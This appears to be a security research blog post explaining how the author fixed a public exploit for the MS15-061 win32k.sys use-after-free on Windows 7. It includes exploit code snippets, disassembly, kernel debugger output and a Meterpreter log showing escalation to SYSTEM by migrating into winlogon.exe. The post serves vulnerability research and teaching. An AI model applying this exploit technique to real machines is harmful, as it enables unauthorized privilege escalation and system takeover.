Recently, the MS15-061 bulletin has received some attention. This security bulletin includes patches for several Windows Kernel vulnerabilities, mainly related to win32k.sys. Details of one of them, discovered by Udi Yavo, have been very well covered.

First, the same Udi Yavo published details about the Use After Free on a blog entry. Later, Dominic Wang wrote a even more detailed analysis of both the vulnerability and its exploitation on this paper. Finally, Meysam firozi implemented the exploitation described by Dominic and published it.

These last days I have been playing with the published exploit, whose ultimate goal is to nullify the ACL of the winlogon.exe process. We won't cover the details of the vulnerability / exploit again because I don't think I can explain it better than the above references .  This vulnerability is definitely a good introduction to win32k.sys exploitation, and there are a lot of awesome materials to work with.

That said, while testing the Meysam's exploit, we have been making improvements here and there. I would like to share the details of the first set of modifications in this blog.

To begin testing, I built the published exploit, commented the DebugBreak() calls and "int 3" instructions, and tested it on a Windows 7 SP1 machine with win32k.sys 6.1.7601.18773. Immediately, I got a user space crash and the winlogon's ACL wasn't nullified:

I then attached a user-mode debugger and ran the exploit again. It caught the next crash in the hooked ClientCopyImage callback, while trying to reuse the freed memory:

An out-of-bounds memory access occurs when trying to compute the address of the HWND handler that will be used to trigger the memory reuse:

NtUserDefSetText(Secondhwnd[SecondWindowIndex], &plstr);

It is notable that a statically-sized array is used to store the window handles used for exploitation:

HWND Secondhwnd[50];

The first HWND in the array is the one whose tagWND is modified to allow execution from kernel context. The remaining window handlers are to reuse the freed memory on the ClientCopyImage User Mode Callback.

Unfortunately, this means which the vulnerability can be triggered only 49 times. Otherwise, more HWND handles are needed. As a brief reminder, the exploitation primitive used here decrements  an arbitrary memory address:

.text:BF8D0038 ; __stdcall HMUnlockObject(x)  
.text:BF8D0038 _HMUnlockObject@4 proc near             ; CODE XREF: ThreadLockExchangeAlways(x,x)+19 p  
.text:BF8D0038                                         ; ThreadLockExchange(x,x)+1D p ...  
.text:BF8D0038  
.text:BF8D0038 arg_0           = dword ptr  8  
.text:BF8D0038  
.text:BF8D0038                 mov     edi, edi  
.text:BF8D003A                 push    ebp  
.text:BF8D003B                 mov     ebp, esp  
.text:BF8D003D                 mov     eax, [ebp+arg_0]  
.text:BF8D0040                 dec     dword ptr [eax+4] ; Allows to decrement the contents of an arbitrary memory address  
.text:BF8D0043                 jnz     short loc_BF8D004B  
.text:BF8D0045                 push    eax  
.text:BF8D0046                 call    _HMUnlockObjectInternal@4 ; HMUnlockObjectInternal(x)  
.text:BF8D004B  
.text:BF8D004B loc_BF8D004B:                           ; CODE XREF: HMUnlockObject(x)+B j  
.text:BF8D004B                 pop     ebp  
.text:BF8D004C                 retn    4  
.text:BF8D004C _HMUnlockObject@4 endp  
   

This decrement occurs every time the use-after-free is exploited in the hooked user-mode callback. This arbitrary memory decrement translates into code execution when it is used to set the "bServerSideWindowProc" bit in the state field of a tagWND object. In the public exploit, the tagWND object is associated with the Secondhwnd[0] window. In this way its window procedure will be executed from kernel context.

The "state" field is found at offset 0x14 on the tagWND object:

   +0x014 state            : Uint4B  
   +0x014 bHasMeun         : Pos 0, 1 Bit  
   +0x014 bHasVerticalScrollbar : Pos 1, 1 Bit  
   +0x014 bHasHorizontalScrollbar : Pos 2, 1 Bit  
   +0x014 bHasCaption      : Pos 3, 1 Bit  
   +0x014 bSendSizeMoveMsgs : Pos 4, 1 Bit  
   +0x014 bMsgBox          : Pos 5, 1 Bit  
   +0x014 bActiveFrame     : Pos 6, 1 Bit  
   +0x014 bHasSPB          : Pos 7, 1 Bit  
   +0x014 bNoNCPaint       : Pos 8, 1 Bit  
   +0x014 bSendEraseBackground : Pos 9, 1 Bit  
   +0x014 bEraseBackground : Pos 10, 1 Bit  
   +0x014 bSendNCPaint     : Pos 11, 1 Bit  
   +0x014 bInternalPaint   : Pos 12, 1 Bit  
   +0x014 bUpdateDirty     : Pos 13, 1 Bit  
   +0x014 bHiddenPopup     : Pos 14, 1 Bit  
   +0x014 bForceMenuDraw   : Pos 15, 1 Bit  
   +0x014 bDialogWindow    : Pos 16, 1 Bit  
   +0x014 bHasCreatestructName : Pos 17, 1 Bit  
   +0x014 bServerSideWindowProc : Pos 18, 1 Bit  
   +0x014 bAnsiWindowProc  : Pos 19, 1 Bit  
   +0x014 bBeingActivated  : Pos 20, 1 Bit  
   +0x014 bHasPalette      : Pos 21, 1 Bit  
   +0x014 bPaintNotProcessed : Pos 22, 1 Bit  
   +0x014 bSyncPaintPending : Pos 23, 1 Bit  
   +0x014 bRecievedQuerySuspendMsg : Pos 24, 1 Bit  
   +0x014 bRecievedSuspendMsg : Pos 25, 1 Bit  
   +0x014 bToggleTopmost   : Pos 26, 1 Bit  
   +0x014 bRedrawIfHung    : Pos 27, 1 Bit  
   +0x014 bRedrawFrameIfHung : Pos 28, 1 Bit  
   +0x014 bAnsiCreator     : Pos 29, 1 Bit  
   +0x014 bMaximizesToMonitor : Pos 30, 1 Bit  
   +0x014 bDestroyed       : Pos 31, 1 Bit  

In the published exploit, the desired tagWND kernel address is leaked in the initialization routine, and its state field (kernelHandle 0x14) is configured as the address to be decremented through a call to the "ArbDecByOne" method:

ArbDecByOne((DWORD)kernelHandle + 0x14);  
  
VOID ArbDecByOne(DWORD addr){  
  *(DWORD *)(originalCLS + 0x58) = addr - 0x4;  
}  
  
void init()  
{  
     // ....  
     /* 
     +0x014 bForceMenuDraw   : Pos 15, 1 Bit 
     +0x014 bDialogWindow    : Pos 16, 1 Bit 
     +0x014 bHasCreatestructName : Pos 17, 1 Bit 
     +0x014 bServerSideWindowProc : Pos 18, 1 Bit 
     +0x014 bAnsiWindowProc  : Pos 19, 1 Bit 
     */  
     kernelHandle = GetKernelHandle(Secondhwnd[0]);  
     ArbDecByOne((DWORD)kernelHandle + 0x14);  //   
     // ....  
}  

Let's look at a Windows kernel debug session, observing the default "state" value of the tagWND object (before corruption):

  +0x014 state            : 0x40020018  
   +0x014 bHasMeun         : 0y0  
   +0x014 bHasVerticalScrollbar : 0y0  
   +0x014 bHasHorizontalScrollbar : 0y0  
   +0x014 bHasCaption      : 0y1  
   +0x014 bSendSizeMoveMsgs : 0y1  
   +0x014 bMsgBox          : 0y0  
   +0x014 bActiveFrame     : 0y0  
   +0x014 bHasSPB          : 0y0  
   +0x014 bNoNCPaint       : 0y0  
   +0x014 bSendEraseBackground : 0y0  
   +0x014 bEraseBackground : 0y0  
   +0x014 bSendNCPaint     : 0y0  
   +0x014 bInternalPaint   : 0y0  
   +0x014 bUpdateDirty     : 0y0  
   +0x014 bHiddenPopup     : 0y0  
   +0x014 bForceMenuDraw   : 0y0  
   +0x014 bDialogWindow    : 0y0  
   +0x014 bHasCreatestructName : 0y1  
   +0x014 bServerSideWindowProc : 0y0  
   +0x014 bAnsiWindowProc  : 0y0  
   +0x014 bBeingActivated  : 0y0  
   +0x014 bHasPalette      : 0y0  
   +0x014 bPaintNotProcessed : 0y0  
   +0x014 bSyncPaintPending : 0y0  
   +0x014 bRecievedQuerySuspendMsg : 0y0  
   +0x014 bRecievedSuspendMsg : 0y0  
   +0x014 bToggleTopmost   : 0y0  
   +0x014 bRedrawIfHung    : 0y0  
   +0x014 bRedrawFrameIfHung : 0y0  
   +0x014 bAnsiCreator     : 0y0  
   +0x014 bMaximizesToMonitor : 0y1  
   +0x014 bDestroyed       : 0y0  
   

The value here is 0x40020018. In order to set bServerSideWindowProc to 1 through decrements, "state" need to have the value 0x3fffffff. It means that the vulnerability needs to be triggered 0x20019 times, definitely more than the 49 HWND handles available. This is the cause of the out-of-bounds user mode crash we were experiencing.

Fortunately, we can take a shortcut to avoid these problems. Let's see what happens if we target tagWND 0x16 for decrement, instead of tagWND 0x14:

kd> dd fea33ad8 + 14 L2  
fea33aec  40020018 80000710  
kd> dd fea33ad8 + 16 L1  
fea33aee  07104002  
   

Now we just need to trigger the vulnerability three times to set the bServerSideWindowProc bit! Even more interesting, after the three decrements, 0x07104002 will become 0x7103fff. This means nothing outside of the "state" field is modified.

That said, we can simplify the original call to ArbDecByOne to become:

ArbDecByOne((DWORD)kernelHandle 0x16);

Then we can run the exploit again. This time there are no crashes. After running it, we can check the permissions for the winlogon.exe process (with ProcessExplorer for example). There should not have been any permissions assigned to the object:

Now we should be able migrate a Meterpreter session, from a non privileged process to the winlogon process, and get a new SYSTEM session back, like this:

  • Get a non privileged session in the target
msf exploit(handler) > rexploit  
[*] Reloading module...  
[*] Started reverse handler on 172.16.158.1:4444  
[*] Starting the payload handler...  
  
[*] Sending stage (885806 bytes) to 172.16.158.132  
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.132:49174) at 2015-09-24 13:25:45 -0500  
meterpreter > sysinfo  
Computer        : WIN-RNJ7NBRK9L7  
OS              : Windows 7 (Build 7601, Service Pack 1).  
Architecture    : x86  
System Language : en_US  
Domain          : WORKGROUP  
Logged On Users : 2  
Meterpreter     : x86/win32  
meterpreter > getpid  
Current pid: 1268  
meterpreter > getuid  
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez  
meterpreter > ps -S winlogon  
  
Process List  
============  
PID   PPID  Name               Arch  Session  User                          Path  
---   ----  ----               ----  -------  ----                          ----  
432   380   winlogon.exe       x86   1                                      C:\Windows\system32\winlogon.exe  
   
  • Run the exploit to nullify the winlogon.exe process ACL

  • Migrate successfully to the winlogon.exe process to get a SYSTEM session

meterpreter > migrate 432  
[*] Migrating from 1268 to 432...  
[*] Migration completed successfully.  
meterpreter > getuid  
Server username: NT AUTHORITY\SYSTEM  
meterpreter >  

Success! The original exploit with the small modifications can be found on this github branch. There are other interesting things to explore with this exploit. Look forward to those in future blog posts!